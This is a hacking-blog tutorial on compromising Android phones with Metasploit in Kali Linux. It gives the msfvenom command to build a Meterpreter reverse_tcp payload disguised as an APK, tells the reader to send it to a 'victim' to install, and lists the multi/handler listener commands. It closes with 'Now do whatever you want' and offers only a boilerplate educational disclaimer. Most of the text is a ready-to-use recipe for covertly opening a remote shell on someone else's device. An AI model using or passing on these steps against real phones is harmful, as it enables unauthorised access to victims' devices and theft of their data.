AndroidKali LinuxPenetration Testing

Exploiting Android Devices using Metasploit in Kali Linux

Hello Tech Kiddies. Here is another tutorial of exploiting android devices. In this post, I will demonstrate how to exploit android devices using the popular metasploit framework which is available in Kali Linux.

What is Metasploit Framework

The Metasploit is an open source framework which contains lots of exploits. The metasploit project offers penetration testing software and provide tools for automating the comparison of a program’s vulnerability and its patched version.

The metasploit framework includes more than 1673 exploits, 959 auxiliary modules, 294 post exploitation modules and 489 payloads in its database. Exploit modules are run against a target to check wheather its vulnerable or not.

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All articles on our website are only for Educational/Informational purposes only. The author is not responsile for any illegal activity. TheHackerStuff does not promote any malicious activites.
Exploiting Android using Metasploit Framework
Requirements –
  • System with Kali installed.
  • Knowledge of basic Linux.
  • Internet Connectivity.
  • Android device to test.

Let’s start with exploiting.

Create a Payload

Create a payload using msfvenom –

Open terminal and type the below command

msfvenom -p android/meterpreter/reverse_tcp lhost= lport=7777 -i 3 > hack.apk

-p stands for payload which we are using.

lhost – Replace with your own local IP. You can find by typing ifconfig.

lport – This is the port number through which the connection will establish.

-i stands for number of iterations the payload will be encoded.

The payload will get ready after executing the above command. You can find the payload in home directory.

Send the payload to the victim. Let the victim to install tha payload. Once the installation of the payload is done.

Fire Metasploit Framework

Open new terminal and fire up Metasploit Framework by typing msfconsole.

It will take some time to start. Once it starts.

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Setting Up Listener

Type below commands for setting up listener. First load the multi-handler by typing the below command.

use exploit/multi/handler

Setup a reverse payload by typing

set payload android/meterpreter/reverse_tcp

Set the lhost with your own local IP.

set lhost

Set the port number.

set lport 7777

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Exploit (Start the Listener)

The final step, start the listener by typing


Hacked!!!! It will open an meterpreter session. Now do whatever you want.

To list down the sessions. Type “sessions -i”.

To connect to the session. Type “session number”.

Note – This attack works within the network.

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Akshay Sharma

Inner Cosmos

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